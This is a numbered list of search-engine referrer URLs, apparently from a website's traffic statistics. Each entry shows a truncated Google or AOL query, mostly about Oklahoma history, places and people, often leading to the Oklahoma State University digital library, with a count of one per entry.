830http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=ca...1
831http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=le...1
832http://aolsearch.aol.com/aol/search?query=Koffee+Kup+Kafe+moves+meetings+to+r...1
833http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Sa...1
834http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=be...1
835http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=an...1
836http://www.google.com/search?hl=en&rlz=1T4GWYG_enUS217US226&sa=X&oi=spell&res...1
837http://aolsearch.aol.com/aol/search?query=Was+frank+houston+ever+the+director...1
838http://www.google.com/search?hl=en&rlz=1T4SUNA_enUS256&q=mildred+potter+from+...1
839http://www.google.com/search?hl=en&rlz=1T4RNWN_enUS248US251&q=BAker+run-in-oi...1
840http://www.google.com/search?hl=en&rlz=1T4SUNA_enUS260US261&q=Oklahoma+Magazi...1
841http://www.google.com/search?hl=en&rlz=1T4SUNA_enUS262&q=wich+2+basketball+te...1
842http://www.google.com/search?hl=en&rlz=1T4GZAZ_enUS223&q=photo+gallery+hospit...1
843http://www.google.com/search?hl=en&rlz=1T4GZAZ_enUS233US233&sa=X&oi=spell&res...1
844http://www.google.com/search?hl=en&rlz=1T4HPND_enIR254IR254&sa=X&oi=spell&res...1
845http://www.google.com/search?hl=en&rlz=1T4HPIB_en___US231&q=oklahoma+facts+19...1
846http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Ed...1
847http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=19...1
848http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Ar...1
849http://www.google.com/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=19...1
850http://aolsearch.aol.com/aol/search?query=The+Conclusion+of+Black+Elks+Vision...1
851http://www.google.com/search?hl=en&rlz=1T4SUNA_enUS266US266&q=Beverly%27s+chi...1
852http://www.google.com/search?hl=en&rlz=1T4SUNA_en___US210&q=lean+hibbs+durant...1
853http://www.google.com/search?hl=en&rlz=1T4TSHB_enUS254US254&q=historic+church...1
854http://www.google.com/search?hl=en&rlz=1T4TSHB_enUS237US238&q=%22take+off+you...1
855http://www.google.com/search?hl=en&q=whose+life+is+it%2C+anyway%3F+by+rosenbe...1
856http://www.google.com/search?hl=en&rls=HPIB%2CHPIB%3A2006-36%2CHPIB%3Aen&q=No...1
857http://aolsearch.aol.com/aol/search?query=flee+markets+in+Oklahoma&page=2&nt=...1
858http://www.google.com/search?hl=en&rls=GWYE%2CGWYE%3A2006-52%2CGWYE%3Aen&q=re...1
859http://www.google.com/search?hl=en&rls=RNWE%2CRNWE%3A2005-40%2CRNWE%3Aen&q=bi...1
860http://www.google.com/search?hl=en&rls=RNWE%2CRNWE%3A2007-41%2CRNWE%3Aen&q=ha...1
861http://www.google.com/search?hl=en&rls=GGLG%2CGGLG%3A2005-44%2CGGLG%3Aen&q=Go...1
862http://www.google.com/search?hl=en&rls=GGLG%2CGGLG%3A2006-01%2CGGLG%3Aen&q=do...1
863http://www.google.com/search?hl=en&rls=GWYA%2CGWYA%3A2006-06%2CGWYA%3Aen&q=pa...1
864http://www.google.com/search?hl=en&rls=GGLR,GGLR:2006-14,GGLR:en&sa=X&oi=spel...1
865http://www.google.com/search?hl=en&rls=GGLG%2CGGLG%3A2005-38%2CGGLG%3Aen&q=+S...1
866http://www.google.com/search?hl=en&rls=com.microsoft%3A*%3AIE-Address&q=afgha...1
867http://www.google.com/search?hl=en&rls=com.microsoft%3A*%3AIE-Address&rlz=1I7...1
868http://aolsearch.aol.com/aol/search?query=dr.+frank+aieta+pics&page=2&nt=SG2&...1
869http://www.google.com/search?hl=en&rls=com.microsoft%3A*&q=cherokee+basket+pa...1
870http://www.google.com/search?hl=en&rls=RNWE,RNWE:2005-35,RNWE:en&sa=X&oi=spel...1
871http://www.google.com/search?hl=en&rls=SUNA%2CSUNA%3A2006-01%2CSUNA%3Aen&q=st...1
872http://www.google.com/search?hl=en&rls=SUNA%2CSUNA%3A2006-27%2CSUNA%3Aen&q=19...1
873http://www.google.com/search?hl=en&rls=SUNA%2CSUNA%3A2006-16%2CSUNA%3Aen&q=ad...1
874http://aolsearch.aol.com/aol/search?query=devils+den++tishimingo+oklahoma&pag...1
875http://www.google.com/search?hl=en&q=wrestling+%22clarence+berryman%22+olympi...1
876http://www.google.com/search?hl=en&rls=DLUS%2CDLUS%3A2007-42%2CDLUS%3Aen&q=ap...1
877http://www.google.com/search?hl=en&q=woola+roc+museum&btnG=Google+Search1
878http://www.google.com/search?hl=en&rls=EGLC%2CEGLC%3A2007-43%2CEGLC%3Aen&q=sh...1
879http://www.google.com/search?hl=en&rls=GFRC%2CGFRC%3A2006-50%2CGFRC%3Aen&q=%2...1
880http://www.google.com/search?hl=en&q=wild+life+park+oklohomo1
881http://www.google.com/search?hl=en&q=will+rogers+stampede+arena+easter1
882http://www.google.com/search?hl=en&q=women+dresssed+as+school+gtrls&btnG=Sear...1
883http://aolsearch.aol.com/aol/search?query=grandma%27s+biscuits+old+plantation...1
884http://www.google.com/search?hl=en&rls=GGLD,GGLD:2006-14,GGLD:en&sa=X&oi=spel...1
885http://www.google.com/search?hl=en&rls=GGLD%2CGGLD%3A2005-16%2CGGLD%3Aen&q=we...1
886http://www.google.com/search?hl=en&rls=GGLD,GGLD:2004-04,GGLD:en&sa=X&oi=spel...1
887http://www.google.com/search?hl=en&rls=GGLC,GGLC:1969-53,GGLC:en&sa=X&oi=spel...1
888http://www.google.com/search?hl=en&rls=GGLD,GGLD:2004-45,GGLD:en&sa=X&oi=spel...1
889http://www.google.com/search?hl=en&rls=GFRC,GFRC:2006-49,GFRC:en&sa=X&oi=spel...1
890http://www.google.com/search?hl=en&rls=GFRD%2CGFRD%3A2007-48%2CGFRD%3Aen&q=fl...1
891http://www.google.com/search?hl=en&rls=GGLC,GGLC:1969-53,GGLC:en&sa=X&oi=spel...1
892http://www.google.com/search?hl=en&rls=GGGL%2CGGGL%3A2007-48%2CGGGL%3Aen&q=%2...1
893http://www.google.com/search?hl=en&rlz=1T4ADBR_enUS253US253&q=%221933+isotta+...1
894http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS262&q=1976+%242.00+bill+ho...1
895http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS262&q=shawnee+oklahoma+ant...1
896http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS251&sa=X&oi=spell&resnum=0...1
897http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS264&q=johnny+prophet++lave...1
898http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS265&q=General+James+Doolit...1
899http://www.google.com/search?hl=en&rls=com.microsoft:en-us&sa=X&oi=spell&resn...1
900http://www.google.com/search?hl=en&rls=com.microsoft:en-us:IE-SearchBox&rlz=1...1
901http://www.google.com/search?hl=en&rlz=1B2GGGL_enUS205US205&q=ekonen+violin&b...1
902http://www.google.com/search?hl=en&rlz=1B2GGGL_enUS177&q=belcher+baseball+cha...1
903http://www.google.com/search?hl=en&rls=com.microsoft:en-us&sa=X&oi=spell&resn...1
904http://www.google.com/search?hl=en&rlz=1T4ADBF_enUS254US256&q=tahlequah+girl+...1
905http://www.google.com/search?hl=en&rlz=1T4ADBF_enUS261US261&q=impregnable+for...1
906http://www.google.com/search?hl=en&rlz=1T4ADBF_enUS235US236&sa=X&oi=spell&res...1
907http://www.google.com/search?hl=en&rlz=1T4ADBR_enUS242US242&q=eldon+lyon+park...1
908http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS265&sa=X&oi=spell&resnum=0...1
909http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS267&q=irish+cream+cake+Okl...1
910http://www.google.com/search?hl=en&rlz=1T4ADBF_enUS235US235&sa=X&oi=spell&res...1
911http://www.google.com/search?hl=en&rlz=1G1GGLQ_ENUS268&q=Zip+Wyatt+&btnG=Sear...1
912http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-US&q=Chickasha+Ok+l...1
913http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us%3AIE-SearchBox&r...1
914http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us%3AIE-SearchBox&r...1
915http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us%3AIE-SearchBox&r...1
916http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us%3AIE-SearchBox&r...1
917http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us%3AIE-SearchBox&r...1
918http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-US&q=quapaw+oklahom...1
919http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us%3AIE-Address&rlz...1
920http://aolsearch.aol.com/aol/search?query=copan+okla+indians+mounds&page=2&nt...1
921http://www.google.com/search?hl=en&rls=com.microsoft:en-us&sa=X&oi=spell&resn...1
922http://www.google.com/search?hl=en&rls=com.microsoft:en-US&sa=X&oi=spell&resn...1
923http://www.google.com/search?hl=en&rls=com.microsoft:en-US&sa=X&oi=spell&resn...1
924http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us&q=process+of+Dru...1
925http://www.google.com/search?hl=en&rls=com.microsoft:en-US&sa=X&oi=spell&resn...1
926http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us%3AIE-SearchBox&r...1
927http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us&q=1958+dodge+spr...1
928http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us&q=jack+riley+scu...1
929http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us&q=bub+warren&btn...1
930http://www.google.com/search?hl=en&q=history+of+folsom+stables+in+vian+oklaho...1
931http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWE,RNWE:2006-1...1
932http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWE,RNWE:2006-2...1
933http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWE,RNWE:2005-4...1
934http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWE,RNWE:2006-2...1
935http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWN,RNWN:2006-4...1
936http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=HPIB,HPIB:2005-4...1
937http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=HPID,HPID:2006-1...1
938http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWE,RNWE:2005-3...1
939http://aolsearch.aol.ca/aol/search?invocationType=topsearchbox.webhome&query=...1
940http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=HPIA,HPIA:2006-0...1
941http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS227U...1
942http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS233U...1
943http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=WZPA,WZPA:2006-1...1
944http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS241U...1
945http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWN,RNWN:2007-5...1
946http://aim.search.aol.com/search/search?query=sally+bell+tulsa&page=2&nt=SG2&...1
947http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=WZPA,WZPA:2005-2...1
948http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=SUNA,SUNA:2006-0...1
949http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS244U...1
950http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-4...1
951http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-5...1
952http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-3...1
953http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLG,GGLG:2005-4...1
954http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLG,GGLG:2006-0...1
955http://aolsearch.aol.co.uk/aol/search?query=Kathleen%20Janger&invocationType=...1
956http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-1...1
957http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-1...1
958http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-1...1
959http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=HPIA,HPIA:2005-2...1
960http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLR,GGLR:2007-3...1
961http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GWYA,GWYA:2005-1...1
962http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLR,GGLR:2006-3...1
963http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GWYA,GWYA:2007-4...1
964http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLG,GGLG:2006-1...1
965http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLG,GGLG:2007-4...1
966http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLR,GGLR:2006-0...1
967http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLR,GGLR:2005-4...1
968http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=DGUS,DGUS:2006-2...1
969http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GFRC_enUS212U...1
970http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GFRD_enUS217U...1
971http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4EGLC_enUS265&...1
972http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGIG_enUS216U...1
973http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGIH_enUS217U...1
974http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DMUS_enUS233U...1
975http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DMUS_enUS241U...1
976http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DMUS_enUS249U...1
977http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DMUS_enUS246U...1
978http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DMUS_enUS229U...1
979http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGLJ_enUS217U...1
980http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGLJ_enUS248U...1
981http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGLG_en___US2...1
982http://aim.search.aol.com/search/search?invocationType=topsearchbox.search&qu...1
983http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGIH_enUS244U...1
984http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGIH_enUS244U...1
985http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGIH_enUS259U...1
986http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GGIH_enUS257U...1
987http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS251U...1
988http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBR_enUS239U...1
989http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBR_enUS256U...1
990http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBR_enUS204U...1
991http://aim.search.aol.com/search/search?query=northeastern+oklahoma+rockhound...1
992http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBR_enUS263&...1
993http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS253U...1
994http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS260U...1
995http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS267U...1
996http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBF_enUS263U...1
997http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DKUS_enUS256U...1
998http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DKUS_enUS230U...1
999http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DKUS_enUS235U...1
1000http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBS_enUS263U...1
1001http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4DKUS_enUS252U...1
1002http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBS_enUS225U...1
1003http://aim.search.aol.com/search/search?invocationType=topsearchbox.search&qu...1
1004http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBS_enUS262U...1
1005http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADBS_enUS261U...1
1006http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GWYE_enUS258U...1
1007http://www.google.com/search?q=youth+national+finals+rodeo+1982+ft+worth&hl=e...1
1008http://www.google.com/search?q=zebco+corp+employment+opportunities&hl=en&star...1
1009http://www.google.com/search?q=youth+camp+in+wyandotte,+Oklahoma&hl=en&safe=a...1
1010http://www.google.com/search?q=zochimilco+floating+gardens&hl=en&rlz=1B2GGFB_...1
1011http://www.google.com/search?source=ig&hl=en&rlz=&q=%22SCISSORTAIL+FLYCATCHER...1
1012http://www.google.com/search?q=william+tharp+attorney+oklahoma&hl=en&rlz=1T4S...1
1013http://www.google.com/search?q=wolfe+sequoyah+school+tahlequah+oklahoma+1934&...1
1014http://www.google.com/search?q=www.+urban+proiect.+md.&hl=en&start=80&sa=N1
1015http://www.google.com/search?q=woody+gaddis+of+oklahoma&hl=en&start=10&sa=N1
1016http://www.google.com/search?q=willard+stone+general+stand+waite+broze&rls=co...1
1017http://aolsearch.aol.com/aol/search?encquery=47186b18c98215d2a4ca81230ee08a3b...1
1018http://aolsearch.aol.com/aol/search?encquery=2b407b33a88cdde46d96fa14d83acb7a...1
1019http://www.google.com/search?source=ig&hl=en&rlz=&q=Edna+Foster+quilts+Perry+...1
1020http://www.google.com/search?source=ig&hl=en&rlz=&q=songs+in+%22the+Drunkard%...1
1021http://www.google.com/search?source=ig&hl=en&rlz=&q=%22j.+don+cook%22&btnG=Go...1
1022http://www.google.com/search?source=ig&hl=en&rlz=&q=%22make+a+turkey+costume%...1
1023http://www.google.com/search?source=ig&hl=en&rlz=&q=Edna+Foster+quilts+Oklaho...1
1024http://www.google.com/search?source=ig&hl=en&rlz=&q=Discoveryland+amphitheate...1
1025http://www.google.com/search?source=ig&hl=en&rlz=&q=susan+everly&btnG=Google+...1
1026http://www.google.com/search?q=was+clyde+cessna%27s+dad+a+farmer%21&ie=utf-8&...1
1027http://www.google.com/search?q=waynoka++snake+hunt&hl=en&start=110&sa=N1
1028http://www.google.com/search?q=warpaint+eagle&hl=en&start=10&sa=N1
1029http://www.google.com/search?q=wedding+band+%22drill+pipe%22&hl=en&lr=&as_qdr...1
1030http://www.google.com/search?q=western+art+of+ralph+wall+&hl=en&rlz=1B3GGGL_e...1
1031http://www.google.com/search?q=vann+flores&ie=utf-8&oe=utf-8&aq=t&rls=com.goo...1
1032http://www.google.com/search?q=vintage+storage+hefner+road&hl=en&start=10&sa=...1
1033http://www.google.com/search?q=walleye+boats+ranger+621+for+sale&hl=en&client...1
1034http://www.google.com/search?q=volume++of+solid+revolution+Kouba&hl=en&start=...1
1035http://www.google.com/search?q=will+rogers+high+school+tulsa+1960&hl=en&rls=G...1
1036http://www.google.com/search?q=wild+game+meat+processing+in+locust+grove+ok&r...1
1037http://www.google.com/search?q=wild+woman+cave+oklahoma+explore&hl=en1
1038http://www.google.com/search?q=wilcox+east+texas+gas+bonus+payment&hl=en&rls=...1
1039http://www.google.com/search?q=wiley+post+model++A++biplane&hl=en&rls=com.mic...1
1040http://www.google.com/search?q=wewoka+oklohoma&rls=com.microsoft:*:IE-SearchB...1
1041http://www.google.com/search?q=what+are+people+saying+about+Oklahoma+State+Pa...1
1042http://www.google.com/search?q=when+did+cherokee+indians+use+warbonnets&hl=en...1
1043http://www.google.com/search?q=what+hunt+capy+bara&hl=en&start=80&sa=N1
1044http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=DGUS,DGUS:2006-1...1
1045http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4DKUS_enU...1
1046http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4DMUS_enU...1
1047http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4ADBR_enU...1
1048http://aolsearch.aol.co.uk/aol/search?query=if+u+work+in+tennessee+and+own+a+...1
1049http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4GGIH_enU...1
1050http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rls=GGLD,GGLD:2...1
1051http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rls=GGLR,GGLR:2...1
1052http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4ADBF_enU...1
1053http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4ADBF_enP...1
1054http://aolsearch.aol.com/aol/search?encquery=0909cd9d0b24245d8721ac887a48e5c9...1
1055http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=ADBS,ADBS:2006-2...1
1056http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=DELA,DELA:2006-0...1
1057http://www.google.com/search?sourceid=navclient&ie=UTF-8&&q=red+fork+and+glen...1
1058http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=DELA,DELA:2006-0...1
1059http://www.google.com/search?sourceid=navclient&gfns=1&ie=UTF-8&rls=SUNA,SUNA...1
1060http://www.google.com/search?sourceid=navclient&gfns=1&ie=UTF-8&rlz=1T4TSHB_e...1
1061http://www.google.com/search?sourceid=navclient&ie=UTF-8&&q=Gid+Graham+Memori...1
1062http://www.google.com/search?sourceid=navclient&hl=ro&ie=UTF-8&rlz=1T4GGLJ_ro...1
1063http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS248&q=oklahoma+t...1
1064http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS263&q=500acre+dr...1
1065http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS267&q=history+of...1
1066http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS259&q=high-fly+s...1
1067http://www.google.com/search?sourceid=gmail&q=Suzette%20Brewer1
1068http://www.google.com/search?sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=...1
1069http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS254&q=1980+henry...1
1070http://aolsearch.aol.com/aol/search?encquery=1501270a541a7e98339ff61650dba3df...1
1071http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS258&q=when+sprin...1
1072http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS258&q=bank+owned...1
1073http://aolsearch.aol.com/aol/search?encquery=0d7e402ba0f5109ad9af03708d21ed10...1
1074http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rls=DKUS,DKUS:2...1
1075http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rls=GFRC,GFRC:2...1
1076http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rls=DGUS,DGUS:2...1
1077http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rls=GGIC,GGIC:2...1
1078http://www.google.com/search?sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=...1
1079http://www.google.com/search?sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=...1
1080http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&&q=Pronghorn+at...1
1081http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&&q=August+Wildf...1
1082http://www.google.com/search?q=uss+haskell+apa+117&hl=en&start=20&sa=N1
1083http://www.google.pt/search?hl=pt-PT&q=armadilloin+industries&btnG=Pesquisa+d...1
1084http://www.google.pt/search?hl=pt-PT&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=...1
1085http://www.google.pl/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4SKPB_enPL...1
1086http://www.google.ro/search?client=firefox-a&rls=org.mozilla%3Aro%3Aofficial&...1
1087http://www.google.ro/search?hl=ro&rlz=1T4GGIK_enRO268&q=outah+lakes+of+oil&me...1
1088http://www.google.pl/search?hl=pl&q=physical+review+volume+38+number+18+15+de...1
1089http://www.google.pl/search?hl=pl&rls=com.microsoft%3A*&q=cra+erford+bramy+&l...1
1090http://www.google.pl/search?q=one+men+cyket&btnG=Szukaj&hl=pl&lr=1
1091http://www.google.pl/search?hl=pl&rlz=1T4SKPB_enPL262PL262&sa=X&oi=spell&resn...1
1092http://www.google.pl/search?hl=pl&q=masyy+france&btnG=Szukaj&lr=lang_pl1
1093http://www.googlesyndicatedsearch.com/u/ell?hl=en&domains=www.library.okstate...1
1094http://www.googlesyndicatedsearch.com/u/ell?hl=en&domains=www.library.okstate...1
1095http://www.googlesyndicatedsearch.com/u/ell?hl=el&domains=www.library.okstate...1
1096http://www.googlesyndicatedsearch.com/u/ell?hl=en&domains=www.library.okstate...1
1097http://www.google.ru/search?complete=1&hl=ru&newwindow=1&q=%22and+of+the+sinl...1
1098http://www.google.ru/search?complete=1&hl=ru&newwindow=1&q=580-338-5813+%22La...1
1099http://www.google.si/search?source=ig&hl=sl&rlz=&q=imelam+game&meta=1
1100http://www.google.se/search?q=princess+mene+egypt&hl=sv&client=firefox-a&chan...1
1101http://www.googlesyndicatedsearch.com/u/ell?hl=en&domains=www.library.okstate...1
1102http://www.google.jo/search?q=the+witcher+walkthrough+Prize-Winning+Cow+&ie=u...1
1103http://www.google.la/search?hl=lo&q=Americas+children%27s+tos+with+no+wheels&...1
1104http://www.google.jo/search?hl=en&q=how+descovered+the+betroleum&meta=1
1105http://www.google.lt/search?hl=lt&q=%22youth+health+centers%22+%22very+first%...1
1106http://www.google.lv/search?hl=lv&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=mer...1
1107http://www.google.it/search?hl=it&q=harley+collactions&meta=1
1108http://www.google.it/search?hl=it&q=nave+concho&meta=1
1109http://www.google.it/search?hl=it&rlz=1T4GGIH_itIT261IT261&q=lndian+sex+club&...1
1110http://www.google.it/search?hl=it&q=prefast+braus&meta=1
1111http://www.google.pl/search?as_q=photography+tricks&hl=pl&num=10&btnG=Szukaj+...1
1112http://www.google.nl/search?q=auto+plumes+coronado&hl=nl&start=10&sa=N1
1113http://www.google.no/search?hl=no&q=free+scores+Gershwin+%22Rhapsody+in+Gersh...1
1114http://www.google.nl/search?hl=nl&q=players+AFN+Basketbal+1968&btnG=Zoeken&me...1
1115http://www.google.no/search?q=fred+grove&hl=no&start=10&sa=N1
1116http://www.google.nl/search?aq=-1&oq=&hl=nl&client=firefox-a&rls=org.mozilla%...1
1117http://www.google.nl/search?gbv=2&hl=nl&q=Yukon+Czech+Hall++Bohemian+Hall+pla...1
1118http://72.14.253.104/search?q=cache:H0b_EtiWfP8J:digital.library.okstate.edu/...1
1119http://www.google.nl/search?hl=nl&client=firefox-a&rls=org.mozilla%3Anl%3Aoff...1
1120http://www.google.it/search?client=firefox-a&rls=org.mozilla%3Ait%3Aofficial&...1
1121http://www.shelbyvilledailyunion.com/features/cnhinsagriculture_story_0531306...1
1122http://64.233.167.104/search?q=cache:FJ5x8pgkbccJ:digital.library.okstate.edu...1
1123http://www.search.com/search?q=Loren+Pahsetopah%2C&nav=3.10.4.101
1124http://209.85.207.104/search?q=cache:DHp5hfptn4AJ:digital.library.okstate.edu...1
1125http://209.85.173.104/search?q=cache:s3pKcorWr7cJ:digital.library.okstate.edu...1
1126http://64.233.167.104/search?q=cache:LDUDRNJLSwkJ:digital.library.okstate.edu...1
1127http://www.optimum.net/Search?q=josh+cosden&p=31
1128http://64.233.167.104/search?q=cache:KEi6KwA79ycJ:digital.library.okstate.edu...1
1129http://www.scirus.com/srsapp/search?q=+decision+treein+petroleum&t=all&sort=0...1
1130http://64.233.167.104/u/ell?q=cache:LFqo0fcBC1EJ:digital.library.okstate.edu/...1
1131http://www5.google.com/search?hl=en&q=honubby+wildlife+reservation&ei=mSLgR-f...1
1132http://www5.google.com/search?hl=en&q=pawnee%2C+oklahoma+millionaires1
1133http://209.85.165.104/search?q=cache:gGyhqBKSEDwJ:digital.library.okstate.edu...1
1134http://209.85.165.104/search?q=cache:9Jur_aAI4w4J:digital.library.okstate.edu...1
1135http://www.tulsatopics.com/tulsatopics/tulsa/tulsahistory/1
1136http://209.85.173.104/search?q=cache:Xl97AG-9VCwJ:digital.library.okstate.edu...1
1137http://www.webcrawler.com/webcrawler/ws/results/Web/charla%20carroll/1/417/To...1
1138http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_result...1
1139http://www.googlesyndicatedsearch.com/u/ell?q=Cherokee+Outlet+Run&hl=en&domai...1
1140http://www.googlesyndicatedsearch.com/u/ell?q=state+fair+speedway&hl=en&domai...1
1141http://www.googlesyndicatedsearch.com/u/ell?q=urban+transportation+pdf.&hl=en...1
1142http://www.googlesyndicatedsearch.com/u/ell?q=otto+gray&sa=Google+Search!&dom...1
1143http://www.googlesyndicatedsearch.com/u/ell?q=women+in+Oklahoma+Agriculture&h...1
